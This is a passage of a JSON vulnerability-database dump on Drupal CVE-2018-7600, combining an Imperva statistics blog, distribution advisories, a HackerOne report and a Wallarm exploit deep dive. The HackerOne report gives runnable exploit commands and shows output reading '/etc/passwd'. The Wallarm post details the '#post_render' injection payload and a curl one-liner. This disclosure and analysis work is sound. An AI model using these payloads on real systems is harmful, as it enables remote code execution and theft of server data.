to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>) _and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n \n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress ](<https://wordpress.org/plugins/>)_official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.\n\n \n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivate more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_[ ](<https://en.wikipedia.org/wiki/WordPress>)(see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.\n\n \n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins._ _This indicator solely looks at the most vulnerabilities. There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n \n\n\n \n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n \n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>) _popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>) _('23-mar' bar in Figure 10 below), and _[CVE-2018-7602 ](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_('25-apr' bar below, also known as _[Drupalgeddon2 ](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_and _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs ](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that published in October. However, since it was not easy to exploit, the number of attacks was small.\n\n \n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions\n * Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)\n * More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-09T14:00:26", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "alpinelinux": [{"lastseen": "2022-07-20T18:06:51", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T07:29:00", "type": "alpinelinux", "title": "CVE-2018-7600", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-01T18:04:00", "id": "ALPINE:CVE-2018-7600", "href": "https://security.alpinelinux.org/vuln/CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-02-03T02:28:33", "bounty": 0.0, "description": "## Summary \nDue to an outdated Drupal version, remote code execution is possible on `www.\u2588\u2588\u2588\u2588\u2588` via CVE-2018-7600. \n\n## Description\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. \n\nVulnerable Host:\n * `www.\u2588\u2588\u2588`\n\nVisiting `https://www.\u2588\u2588\u2588/\u2588\u2588\u2588` we can see that we have a Drupal with version 7.54, which was updated the last time in 2017-02-01.\n\nThere are several critical and highly critical vulnerabilities known for this version (see `https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/7.x` and `https://www.drupal.org/security`). Among them is `SA-CORE-2018-002` (CVE-2018-7600), which I will demonstrate here. \n\nNote: I am reporting this here, since the page `https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588` seems to belong to the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, which belongs to the DOD. The footer further states: `\u2588\u2588\u2588\u2588\u2588\u2588. [...]`\n\n## Step-by-step Reproduction Instructions\n\n1. Download the git repository with the exploit: `git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2`\n * Install dependencies if necessary `gem install nokogiri`\n\n2. Run the exploit with ruby `ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login`\n\nParameters explanation: \n```\n-u, --url URL Service URL\n-v, --version VERSION Target Drupal version {7,8}\n-c, --command COMMAND Command to execute\n--form Form to attack, by default '/user/password' in Drupal 7 \n```\nThe above command outputs:\n```\nroot@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login\ndrupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup\n[i] POST: form_id=user_pass&_triggering_element_name=name\n[i] 200\n[*] Obtained build id!: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ndrupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete\ndrupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588/file/ajax/name/%23value/\u2588\u2588\u2588\u2588\u2588\u2588\n[i] POST: form_build_id=\u2588\u2588\u2588\u2588\u2588\n[i] Response code: 200\nuid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0\nroot@5b08dc005375:/Drupalgeddon2# \n```\nAs we can see, we successfully executed the `id` command, which responded with `uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0`\n\nI am also providing the output of `/etc/passwd` which I obtained with command \n```\nruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c \"cat /etc/passwd\" --form user/login\n```\nOutput: \n```\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n## Resources\n * https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588/7.x\n * https://www.drupal.org/security\n * https://github.com/dreadlocked/Drupalgeddon2\n * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600\n * https://www.drupal.org/sa-core-2018-002\n\n## Mitigation/Remediation Actions\nUpgrade to the most recent version of Drupal 7 core.\n\n## Impact\n\nCritical - Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-21T07:51:14", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-03-24T20:24:17", "id": "H1:1063256", "href": "https://hackerone.com/reports/1063256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2019-09-26T22:28:10", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T18:25:00", "type": "f5", "title": "Drupal vulnerability CVE-2018-7600", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T18:25:00", "id": "F5:K22854260", "href": "https://support.f5.com/csp/article/K22854260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2018-04-25T08:38:51", "description": "#### New Drupal Vulnerability in Detail\n\n#### By @aLLy\n\nThe second Drupalgeddon has come! It is a new variant of a critical vulnerability in one of the most popular CMSs, which caused a big stir. This newly-discovered breach allows any unregistered user execute commands in the target system by means of a single request.\n\nThe problem is further aggravated by the fact that it puts all the most current versions of the application (7.x and 8.x branches, up to 8.5.0) under threat. The number of potentially exploitable targets is very high.\n\n### INFO\n\nThe assigned ID for the vulnerability is [CVE-2018\u20137600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>). It has the highest threat level (\u201chighly critical\u201d).\n\nThe developers have issued a [patch](<https://www.drupal.org/sa-core-2018-002>) as on March 28, 2018, however, as recently as April 12, there were still no links to PoC or the detailed description of the problem in the Drupal public domain. It should be noted that the patch suggested by the developers was also very laconic and gave no indication as to where the vulnerability could be discovered. The application is easily installed; moreover, Drupal has an official repository at Docker Hub, and the deployment of a container with the required CMS version only takes a couple of well documented commands. Personally, I like to use [JetBrains PhpStorm](<https://www.jetbrains.com/phpstorm/>) for debugging.\n\nGiven that the cat is out of the bag, let\u2019s take a critical look at this exploit and study it more closely.\n\n### **Deep Dive**\n\nFirst, let\u2019s take a look at the [patch](<https://github.com/drupal/drupal/commit/19b69fe8af55d8fac34a50563a238911b75f08f7>) which fixes the vulnerability.\n\n_Drupalgeddon 2 vulnerability patch commit_\n\nCool, isn\u2019t it? The developers have simply added filtering of all data submitted by users.\n\nHowever, this patch can shed some light on the nature of the vulnerability. Pay attention to the code of the checking procedure: the data is handled by the method sanitize, which invokes stripDangerousValues.\n\n**/core/lib/Drupal/Core/DrupalKernel.php**\n \n \n 545: public function preHandle(Request $request) { \n 546: _// Sanitize the request. \n _547: $request = RequestSanitizer::sanitize( \n 548: $request, \n 549: (array) Settings::get(RequestSanitizer::SANITIZE_WHITELIST, [])\n\n**/core/lib/Drupal/Core/Security/RequestSanitizer.php**\n \n \n 40: public static function sanitize(Request $request, $whitelist, $log_sa \n \u2026 \n 44: $request->query->replace(static::stripDangerousValues($request->q\n\nThis method, in turn, executes verification of all the submitted parameters. Zero values beginning with # and values that were not whitelisted are stripped.\n\n**/core/lib/Drupal/Core/Security/RequestSanitizer.php**\n \n \n 84: protected static function stripDangerousValues($input, array $whiteli \n 85: if (is_array($input)) { \n 86: foreach ($input as $key => $value) { \n 87: if ($key !== \u2018\u2019 && $key[0] === \u2018#\u2019 && !in_array($key, $whitelis \n 88: unset($input[$key]); \n 89: $sanitized_keys[] = $key; \n 90: } \n 91: else { \n 92: $input[$key] = static::stripDangerousValues($input[$key], $wh \n 93: } \n 94: } \n 95: } \n 96: return $input; \n 97: }\n\nWhat are those \u201cmystic\u201d parameters beginning with an pound sign? They are special placeholders for Drupal Render API. This API was introduced in the version 7.0 of the CMS and is used for rendering structured data into HTML markup.\n\nBefore the rendering phase, the data required for creating the requested page and its individual blocks is stored in the form of special arrays. This provides ample opportunities for changing the markup or the content of the page at any time during the page load or right after.\n\nRender API implements so-called Renderable Arrays (or Render Arrays). They are structured arrays, that provide data along with hints as to how this data should be rendered (presented) for the user. Keys with the hash symbol (#) are the properties used by the rendering interpreter.\n\nThere is a set number of pre-defined properties, such as form, html_tag, value, markup, etc. Most them are described in the official Forms API whitepapers.\n\nFor the purposes of studying of Drupalgeddon 2 vulnerability, we are interested in the properties which invoke call_user_func during processing. Among them are #pre_render, #post_render, #access_callback, #submit, #lazy_builder, #validate. To demonstrate how exploit works, I\u2019m using the key #post_render. The processing of this element is described in the Renderer.php.\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 500: if (isset($elements[\u2018#post_render\u2019])) { \n 501: foreach ($elements[\u2018#post_render\u2019] as $callable) { \n 502: if (is_string($callable) && strpos($callable, \u2018::\u2019) === FALSE \n 503: $callable = $this->controllerResolver->getControllerFromDefi \n 504: } \n 505: $elements[\u2018#children\u2019] = call_user_func($callable, $elements[ \n 506: } \n 507: }\n\nNow we need to find a point where user data is submitted to the function render, so we can incorporate this property with the desirable parameters. It\u2019s best if we focus on points that are accessible to unauthorized users, as we know that exploitation of the vulnerability does not require authentication or rights.\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 182: public function render(&$elements, $is_root_call = FALSE) { \n \u2026 \n 194: try { \n 195: return $this->doRender($elements, $is_root_call); \n \u2026 \n 207: protected function doRender(&$elements, $is_root_call = FALSE) {\n\nDrupal is huge, and search for such points can take a while, so I won\u2019t bore you with this task (given that the [Check Point](<https://www.checkpoint.com/>) experts have discovered all that there is to discover already). On registering a new user, the CMS allows you to upload anavatar.\n\nLet\u2019s create a new account and upload some picture after routing the traffic through a proxy.\n\n_User avatar upload request_\n\nThis request is processed by the ManagedFile class method uploadAjaxCallback.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n\n172: public static function uploadAjaxCallback(&$form, FormStateInterface\n\nTake a note of the element_parents parameter in the request.\n\nelement_parents=user_picture/widget/0\n\nIt is used in further processing.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n \n \n 174: $renderer = \\Drupal::service(\u2018renderer\u2019); \n 175: \n 176: $form_parents = explode(\u2018/\u2019, $request->query->get(\u2018element_parents\n\nThe submitted data is broken down by slashes and are used to retrieve data from the main form via NestedArray::getValue.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n\n179: $form = NestedArray::getValue($form, $form_parents);\n\n**/core/lib/Drupal/Component/Utility/NestedArray.php**\n \n \n 69: public static function &getValue(array &$array, array $parents, &$key \n 70: $ref = &$array; \n 71: foreach ($parents as $parent) { \n 72: if (is_array($ref) && (isset($ref[$parent]) || array_key_exists($ \n 73: $ref = &$ref[$parent]; \n 74: } \n 75: else { \n 76: $key_exists = FALSE; \n 77: $null = NULL; \n 78: return $null; \n 79: } \n 80: } \n 81: $key_exists = TRUE; \n 82: return $ref; \n 83: }\n\nAnd then, based on the received data, the resulted array is rendered.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n\n193: $output = $renderer->renderRoot($form);\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 129: public function renderRoot(&$elements) { \n 130: _// Disallow calling ::renderRoot() from within another ::renderRoo \n _131: if ($this->isRenderingRoot) { \n \u2026 \n 138: $output = $this->executeInRenderContext(new RenderContext(), funct \n 139: return $this->render($elements, TRUE); \n 140: });\n\nNow let\u2019s use a debugger to analyze what\u2019s going on here.\n\nLet\u2019s interrupt request line NestedArray::getValue.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n \n \n 176: $form_parents = explode(\u2018/\u2019, $request->query->get(\u2018element_parents \n \u2026 \n 179: $form = NestedArray::getValue($form, $form_parents); _# you\u2019re here_\n\n_Debugging of uploadAjaxCallback after uploading an avatar_\n\nThe array $form_parents received from the parameter element_parents serves as a custom path to the desired element in $form for the subsequent rendering. In my case, it looks as follows: $form[\u201cuser_picture\u201d][\u201cwidget\u201d][0]. The keys are separated by slashes, as is customary in Unix paths.\n\nYou can as easily put in your own path to the desired element \u2014 you just need to find it. Pay attention to the fields in the new account registration form, which can be filled in, namely mail and name. The parameter name. filters the user data, but the parameter name is more tolerant to such operations. Let\u2019s try to convert this parameter into an array and submit a line beginning with # as a key.\n\n_Attribute injection in the_ mail _parameter_\n \n \n $form => Array \n ( \n \u2026 \n [account] => Array \n ( \n [_#type] => container \n _[_#weight] => -10 \n _[mail] => Array \n ( \n [_#type] => email \n _[_#title] => Drupal\\Core\\StringTranslation\\TranslatableMarkup Ob \n _\u2026 \n [_#name] => mail \n _[_#value] => Array \n _( \n [_#test] => \n _) \n \u2026 \n ) \n ) \n )\n\nNow, if we take element_parents, put the value account/mail/#value in it and insert a breakpoint after the execution of NestedArray::getValue, we get a resulting renewed $form containing our parameters.\n\n_Injection of a random element and reassignment of _$form\n\nIn the next phase, we go back to the magic property #post_render and create a payload array based on this attribute. The function which must be executed is specified as the first element of the array.\n\nmail[_#post_render][] = \u2018exec\u2019_\n\nNext, we must specify the execution parameters. If you look at call_user_func, you\u2019ll see that they are taken from the property #children.\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 500: if (isset($elements[\u2018#post_render\u2019])) { \n 501: foreach ($elements[\u2018#post_render\u2019] as $callable) { \n \u2026 \n 505: $elements[\u2018#children\u2019] = call_user_func($callable, $elements[\n\nLet\u2019s put them in this place.\n\nmail[_#children] = \u2018uname -a\u2019_\n\nNow, let\u2019s submit the resulting form.\n\n_Everything is set for RCE exploitation._\n\nVoila! \ud83d\ude0a\n\n_Successfully executed RCE-exploit for Drupal 8.5.0_\n\nLet\u2019s remove all the extra stuff from the query and frame it as a single-line curl command.\n\n$ curl -s -X \u2018POST\u2019 \u2014 data \u2018mail[%23post_render][]=exec&mail[%23children]=p\n\nIt\u2019s elegant and so, so easy!\n\n#### **Conclusions**\n\nWhat can I say to sum it all up?\n\nThe first red flags related to this problem were raised at the end of last year when the researcher nicknamed WhiteWinterWolf published a post in his blog about another possible scenario of Drupalgeddon exploitation. Let me remind you that the original vulnerability allowed unauthorized users to execute SQL injections.\n\nWhiteWinterWolf also provided an example of how an intruder can use this vulnerability for running remote commands after manipulating the same placeholders in an array.\n\nThe problem is highly critical for all owners of Drupal sites. Massive attacks are distinct possibility. It is very likely that cybercriminals have already added this exploit to their armory, so be proactive, write up some WAF policies and roll out relevant patches. By the way, if you don\u2019t want to upgrade, the developers have posted patches for all current Drupal branches in their official announcement.\n\nStill, the best way is to install the latest CMS versions: Drupal 7.58 for 7.x branch and Drupal 8.5.1 for 8.x. They have fixed the vulnerability in these updates, or that\u2019s what they told us, anyways.\n\n\n\n* * *\n\n[Drupalgeddon Two.](<https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "cvss3": {}, "published": "2018-04-20T19:31:22", "type": "wallarmlab", "title": "Drupalgeddon Two.", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-20T19:31:22", "href": "https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18?source=rss----49b51199b3da---4", "id": "WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:52", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T07:29:00", "type": "debiancve", 